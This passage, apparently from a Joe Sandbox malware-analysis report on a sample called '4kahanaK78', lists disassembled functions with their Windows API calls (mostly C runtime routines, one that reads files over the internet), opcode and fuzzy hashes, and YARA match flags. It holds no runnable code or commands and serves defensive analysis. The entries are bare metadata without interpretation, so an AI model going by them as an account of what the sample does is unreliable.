                                      • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                      • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                    • _free.LIBCMT ref: 0041700B
                                    • _free.LIBCMT ref: 0041701D
                                    • _free.LIBCMT ref: 0041702F
                                    • _free.LIBCMT ref: 00417041
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: e9905c8b19ab3d426ab646f49b16c807e4d2b9b7b2a9eaa828597b4964810506
                                    • Instruction ID: 1bbc7c59558bdb80d40cd5d769ae83ba842cf1fe79b15496f27bd1d3c69b9f62
                                    • Opcode Fuzzy Hash: e9905c8b19ab3d426ab646f49b16c807e4d2b9b7b2a9eaa828597b4964810506
                                    • Instruction Fuzzy Hash: 2AF04432705240678534DB5DE486D967BE9AF44760758481BF508D7A12D73CFCD0465C
                                    Function 10007CBA Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _free
                                    • String ID: *?
                                    • API String ID: 269201875-2564092906
                                    • Opcode ID: 5cf7f851aaec087829ec43eeaab6f60b67ed4c75ee81a41c35adb74eb9a8a420
                                    • Instruction ID: 7b94f7270babd41a129a228fbe6cecbdc5f775369f8c1ab1d48f9322781d5c4e
                                    • Opcode Fuzzy Hash: 5cf7f851aaec087829ec43eeaab6f60b67ed4c75ee81a41c35adb74eb9a8a420
                                    • Instruction Fuzzy Hash: 0C614175D0021A9FEB14CFA9C8815EDFBF5FF48390B2581AAE809F7344D675AE418B90
                                    Function 10004F12 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,10004EC3,00000000,?,00000001,?,?,?,10004FB2,00000001,FlsFree,10011CC0,FlsFree), ref: 10004F1F
                                    • GetLastError.KERNEL32(?,10004EC3,00000000,?,00000001,?,?,?,10004FB2,00000001,FlsFree,10011CC0,FlsFree,00000000,?,10003ECF), ref: 10004F29
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 10004F51
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: LibraryLoad$ErrorLast
                                    • String ID: api-ms-
                                    • API String ID: 3177248105-2084034818
                                    • Opcode ID: 194d23d78a7530926df8253abc19602fce8fc6649c780d967afcd7dccf04e9f6
                                    • Instruction ID: 9caaa85424732638a533447db036373c94518d46a1d9f65793ecca3e1a8de25d
                                    • Opcode Fuzzy Hash: 194d23d78a7530926df8253abc19602fce8fc6649c780d967afcd7dccf04e9f6
                                    • Instruction Fuzzy Hash: 19E01274644245B6FB155B60DC45F993B95DB047D0F118030FA0CA80E5DBB1E99599C9
                                    Function 04CF1C22 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _strrchr
                                    • String ID:
                                    • API String ID: 3213747228-0
                                    • Opcode ID: 00bd01e052c6ca4725e3dc98c9fc8d994eb0987dbdd7d2e2c545ffa9104eb7c9
                                    • Instruction ID: 77a643673ec7d88cd29a2edf076a5074e238e4b33c83bd47411dea4c6174af87
                                    • Opcode Fuzzy Hash: 00bd01e052c6ca4725e3dc98c9fc8d994eb0987dbdd7d2e2c545ffa9104eb7c9
                                    • Instruction Fuzzy Hash: 3CB12831A00285DFEB55CF29CC507BEBBF6EF45350F1C456AD6459B241EA39AE02CB60
                                    Function 04B52A89 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _strrchr
                                    • String ID:
                                    • API String ID: 3213747228-0
                                    • Opcode ID: 00bd01e052c6ca4725e3dc98c9fc8d994eb0987dbdd7d2e2c545ffa9104eb7c9
                                    • Instruction ID: 02a552d982c9984a1b1bac77fe61ae331d2408373eee9c2b43d7e4130cbb2361
                                    • Opcode Fuzzy Hash: 00bd01e052c6ca4725e3dc98c9fc8d994eb0987dbdd7d2e2c545ffa9104eb7c9
                                    • Instruction Fuzzy Hash: 1FB11532A062869FEB19CF28C8807BEFBF5EF45340F1445E9DC549B2A1D634A902CF60
                                    Function 00412822 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _strrchr
                                    • String ID:
                                    • API String ID: 3213747228-0
                                    • Opcode ID: ea5dc4856b585dd579de17702f7f9642f7d44acf4acc8e31691820c31d006a79
                                    • Instruction ID: 6012ccbf35aa319517377e765832e55e269021952583a9b626e33c473f35baf7
                                    • Opcode Fuzzy Hash: ea5dc4856b585dd579de17702f7f9642f7d44acf4acc8e31691820c31d006a79
                                    • Instruction Fuzzy Hash: A6B13571A002459FDB25CF68CA817EEBBE1EF55340F14816BD845EB341D2BC9992CB68
                                    Function 04B41AE7 Relevance: 6.3, APIs: 4, Instructions: 298networkfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 04B41B6C
                                    • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 04B41B8B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileInternet$PointerRead
                                    • String ID:
                                    • API String ID: 3197321146-0
                                    • Opcode ID: f9ec063c9d2e41b3af08dc7f95bc4ff4171d8ea44204e87ef2b2e3f71c5be050
                                    • Instruction ID: 38f03f2f50ce7fb5e1d488fa682dcfb14914d823c11f0e815f3cc0a36ff6d32e
                                    • Opcode Fuzzy Hash: f9ec063c9d2e41b3af08dc7f95bc4ff4171d8ea44204e87ef2b2e3f71c5be050
                                    • Instruction Fuzzy Hash: 96C16EB0A002189FEB25CF28CD88BEAB7B5FF89704F1045D8E509A7690D775BA85CF50
                                    Function 04CEA284 Relevance: 6.2, APIs: 4, Instructions: 168COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: AdjustPointer
                                    • String ID:
                                    • API String ID: 1740715915-0
                                    • Opcode ID: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
                                    • Instruction ID: 2592838cd25b8c71b616a3209bd307f9368e49ef6110a60e681fa7179048d052
                                    • Opcode Fuzzy Hash: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
                                    • Instruction Fuzzy Hash: FD51C0B2A05202EFEB299F56D840BBA77A7EF44314F14412DE80597291E737FA81D790
                                    Function 10003EDA Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: AdjustPointer
                                    • String ID:
                                    • API String ID: 1740715915-0
                                    • Opcode ID: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
                                    • Instruction ID: 9e97f9b43940e94c385e873cf65d718b9a08959cb0185780d8acf6a52a646172
                                    • Opcode Fuzzy Hash: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
                                    • Instruction Fuzzy Hash: 9D51BFB6A04202AFFB16CF11D941BAB77A8EF047D0F11856DEA05A72A9DB31EC40D794
                                    Function 04B4B0EB Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AdjustPointer
                                    • String ID:
                                    • API String ID: 1740715915-0
                                    • Opcode ID: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
                                    • Instruction ID: f0bc5704de4a8aec523d52425b52e3bee8f4acdc25eac687b52e62684058ebf2
                                    • Opcode Fuzzy Hash: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
                                    • Instruction Fuzzy Hash: CE51E372A08602AFEF298F10D880B7A7BA4FF84304F1445ADDA4597A90E731F951FB91
                                    Function 0040AE84 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: AdjustPointer
                                    • String ID:
                                    • API String ID: 1740715915-0
                                    • Opcode ID: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
                                    • Instruction ID: 88ef4a02ba2930d6a04adc46f9a2f5105df9e51eba4518f207ac4bbffbfe15f9
                                    • Opcode Fuzzy Hash: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
                                    • Instruction Fuzzy Hash: E151D1B1600303AFDB299F15D841BABB3A4EF44314F14413FE801A76D2E739AC65D79A
                                    Function 10007BCE Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 100081F0: _free.LIBCMT ref: 100081FE
                                      • Part of subcall function 10008DC4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,1000B163,?,00000000,00000000), ref: 10008E70
                                    • GetLastError.KERNEL32 ref: 10007C36
                                    • __dosmaperr.LIBCMT ref: 10007C3D
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10007C7C
                                    • __dosmaperr.LIBCMT ref: 10007C83
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                    • String ID:
                                    • API String ID: 167067550-0
                                    • Opcode ID: b7af9aa25762b68c67a19e1abcb47a9b758bf4775fc138b5a0a35b694754267d
                                    • Instruction ID: 4d86bd2ae757562d8160192595c5732c56f34f1228d97d68919d00ee2a874974
                                    • Opcode Fuzzy Hash: b7af9aa25762b68c67a19e1abcb47a9b758bf4775fc138b5a0a35b694754267d
                                    • Instruction Fuzzy Hash: 9021AC75A00216AFB720DF658C85D5BB7ADFF042E4B108529FA699724ADB35EC408BA0
                                    Function 04B55CB0 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 04B4FE6F: _free.LIBCMT ref: 04B4FE7D
                                      • Part of subcall function 04B5375E: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,?,04B588CA,?,?,?,00000000,?,04B58639,0000FDE9,00000000,?), ref: 04B53800
                                    • GetLastError.KERNEL32 ref: 04B55D18
                                    • __dosmaperr.LIBCMT ref: 04B55D1F
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 04B55D5E
                                    • __dosmaperr.LIBCMT ref: 04B55D65
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                    • String ID:
                                    • API String ID: 167067550-0
                                    • Opcode ID: 2446def1f9b4e50dcca6d59721d257bc06bfc03ce38444d90e74b9eed1d69467
                                    • Instruction ID: 08308f1979cd23a2967e901f9ccb00e7a8daaa7dba466098c2f7cb83c5f6d14b
                                    • Opcode Fuzzy Hash: 2446def1f9b4e50dcca6d59721d257bc06bfc03ce38444d90e74b9eed1d69467
                                    • Instruction Fuzzy Hash: 9821D872600605BFEB30AF65CC84F6BF7ACEF402697004598ED29975A0E731FD009750
                                    Function 00415A49 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0040FC08: _free.LIBCMT ref: 0040FC16
                                      • Part of subcall function 004134F7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,0041384C,?,00000000,00000000), ref: 00413599
                                    • GetLastError.KERNEL32 ref: 00415AB1
                                    • __dosmaperr.LIBCMT ref: 00415AB8
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00415AF7
                                    • __dosmaperr.LIBCMT ref: 00415AFE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                    • String ID:
                                    • API String ID: 167067550-0
                                    • Opcode ID: ca7ce2db1058a54df87d71c7a914b0946fa5af84fdd88a5f61fb18a9b6564db0
                                    • Instruction ID: 3f7c4113f524ad2c0abd5e3f91609bb3d7c3a41f61a1f3e5b12bbd4c913db815
                                    • Opcode Fuzzy Hash: ca7ce2db1058a54df87d71c7a914b0946fa5af84fdd88a5f61fb18a9b6564db0
                                    • Instruction Fuzzy Hash: 5221D871604615EFDB20AF66DCC19EBB76CEF443A8710862BF82497291D73CED8187A4
                                    Function 04B51DB1 Relevance: 6.1, APIs: 4, Instructions: 77COMMONLIBRARYCODE
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
                                    • Instruction ID: ad62378e5a4cb657ef427a22b8bffecd54b32d2b315963f5834abef0fb0ddb65
                                    • Opcode Fuzzy Hash: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
                                    • Instruction Fuzzy Hash: 7121D871F01221BBDB318B2C9C84B5AB764EF417A0F150DA1ED06A72B0EA30FD01D6E4
                                    Function 10006E9C Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(?,?,00000000,100059DF,?,10001F4F,00000000), ref: 10006EA1
                                    • _free.LIBCMT ref: 10006EFE
                                    • _free.LIBCMT ref: 10006F34
                                    • SetLastError.KERNEL32(00000000,0000000B,000000FF,?,?,00000000,100059DF,?,10001F4F,00000000), ref: 10006F3F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ErrorLast_free
                                    • String ID:
                                    • API String ID: 2283115069-0
                                    • Opcode ID: 72c61705ed6df8d98b2a0eedb55838999870745f68928b586d93f1ef3c7b0de2
                                    • Instruction ID: 52538b18816049bcedc1269911990ba1ec418b01f35f7c97631a1a3369067357
                                    • Opcode Fuzzy Hash: 72c61705ed6df8d98b2a0eedb55838999870745f68928b586d93f1ef3c7b0de2
                                    • Instruction Fuzzy Hash: BE11E33AA006566AF242D674DC81E6F328BEBC92F57310134F528921D9DE74DE094631
                                    Function 04B51464 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(04B4213F,?,04B42143,04B4C610,?,04B4213F,0041D0A0,?,04B51714,00000000,0041D0A0,00000000,00000000,04B4213F), ref: 04B51469
                                    • _free.LIBCMT ref: 04B514C6
                                    • _free.LIBCMT ref: 04B514FC
                                    • SetLastError.KERNEL32(00000000,0042A174,000000FF,?,04B51714,00000000,0041D0A0,00000000,00000000,04B4213F), ref: 04B51507
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast_free
                                    • String ID:
                                    • API String ID: 2283115069-0
                                    • Opcode ID: d87a196747eb98be69f930891d617142d2a680cdf12a75ecda7b171a806f77d5
                                    • Instruction ID: 83c9c325586f02c49b688f083690531fbb78fc7f4d2aeebf1767d39968b0b31e
                                    • Opcode Fuzzy Hash: d87a196747eb98be69f930891d617142d2a680cdf12a75ecda7b171a806f77d5
                                    • Instruction Fuzzy Hash: BF11C232F012043BE7222BBCAC85F3AA659CBC1278B6456F4FD24961F0EB25AC129915
                                    Function 004111FD Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(00401ED8,?,00401EDC,0040C3A9,?,00401ED8,7591DF80,?,004114AD,00000000,7591DF80,00000000,00000000,00401ED8), ref: 00411202
                                    • _free.LIBCMT ref: 0041125F
                                    • _free.LIBCMT ref: 00411295
                                    • SetLastError.KERNEL32(00000000,00000008,000000FF,?,004114AD,00000000,7591DF80,00000000,00000000,00401ED8), ref: 004112A0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ErrorLast_free
                                    • String ID:
                                    • API String ID: 2283115069-0
                                    • Opcode ID: 8f2be2869976a8119261bfaf498dece40e74cd62e7ae4b35ba2787d73ab106da
                                    • Instruction ID: cded345c8d5c530dafeb31fb37215a8dc2974a232bbf80fd36b18c5a372c037c
                                    • Opcode Fuzzy Hash: 8f2be2869976a8119261bfaf498dece40e74cd62e7ae4b35ba2787d73ab106da
                                    • Instruction Fuzzy Hash: 8011A7327005002A965127B57C86EFB26698BC57B8B64037BFB15E22F1EA3D8C92411D
                                    Function 10006FF3 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(?,?,?,1000592B,10007A62,?,?,100066F0), ref: 10006FF8
                                    • _free.LIBCMT ref: 10007055
                                    • _free.LIBCMT ref: 1000708B
                                    • SetLastError.KERNEL32(00000000,0000000B,000000FF,?,?,1000592B,10007A62,?,?,100066F0), ref: 10007096
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ErrorLast_free
                                    • String ID:
                                    • API String ID: 2283115069-0
                                    • Opcode ID: cb1c894d2cda448839c8e2a8665fbefda6a0446c15ff34be0ccd710a5c402308
                                    • Instruction ID: 7e0a2054198a3f627b51ebbd791d94cb99ce3d76a099f8cfcb9b0e2a4681bd24
                                    • Opcode Fuzzy Hash: cb1c894d2cda448839c8e2a8665fbefda6a0446c15ff34be0ccd710a5c402308
                                    • Instruction Fuzzy Hash: B8110236E00514AAF352C6748CC5E6F328AFBC92F17210724F52C921EADE79DE048631
                                    Function 04B515BB Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(?,?,?,04B4C5A5,04B52748,?,?,04B4A3C2,?,?,?,04B41353,?,04B4370E,?,?), ref: 04B515C0
                                    • _free.LIBCMT ref: 04B5161D
                                    • _free.LIBCMT ref: 04B51653
                                    • SetLastError.KERNEL32(00000000,0042A174,000000FF,?,04B4A3C2,?,?,?,04B41353,?,04B4370E,?,?,?), ref: 04B5165E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast_free
                                    • String ID:
                                    • API String ID: 2283115069-0
                                    • Opcode ID: 7782d265afb65f697e55785a8c86fcbb5444133996192f0522372e2b86f319e8
                                    • Instruction ID: 67b24782ee60f7b0215e44da9312ff3ebd04ff82c535b599612bba0dd6aeb964
                                    • Opcode Fuzzy Hash: 7782d265afb65f697e55785a8c86fcbb5444133996192f0522372e2b86f319e8
                                    • Instruction Fuzzy Hash: 6D11E536F012002BE72267BD7C85F3AA25ADBC5278BA903F5FD24921F0DB75AC119515
                                    Function 00411354 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(?,?,?,0040C33E,004124E1,?,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?), ref: 00411359
                                    • _free.LIBCMT ref: 004113B6
                                    • _free.LIBCMT ref: 004113EC
                                    • SetLastError.KERNEL32(00000000,00000008,000000FF,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?,?), ref: 004113F7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ErrorLast_free
                                    • String ID:
                                    • API String ID: 2283115069-0
                                    • Opcode ID: a225b34e5669a597189d7f1afa456a980380f95de764cdce8a1da94a10b7a370
                                    • Instruction ID: 755f6b258ceaa8e65099160f8bc9def63f750f9b951ab46e134be7d7a93c0062
                                    • Opcode Fuzzy Hash: a225b34e5669a597189d7f1afa456a980380f95de764cdce8a1da94a10b7a370
                                    • Instruction Fuzzy Hash: AD11CA317005042BA611277A6C82EEB16598BC13B8B64033BFF24821F1EA2D8C92411D
                                    Function 04B4C07E Relevance: 6.1, APIs: 4, Instructions: 62COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • FreeLibrary.KERNEL32(00000000,?,?,?,04B4C13F,?,?,0042B000,00000000,?,04B4C26A,00000004,0041EAFC,0041EAF4,0041EAFC,00000000), ref: 04B4C10E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FreeLibrary
                                    • String ID:
                                    • API String ID: 3664257935-0
                                    • Opcode ID: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
                                    • Instruction ID: fc2cc1ff71d54b07b6cac171b20c902f5989dabbeed35ce056e4c10f738151fd
                                    • Opcode Fuzzy Hash: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
                                    • Instruction Fuzzy Hash: B811E731A42221ABDB224F699C45B9D3B74EF46FA0F1241A0FE01B7380D770F90096D8
                                    Function 04CEA1A4 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 04CEA1C0
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 04CEA1D9
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
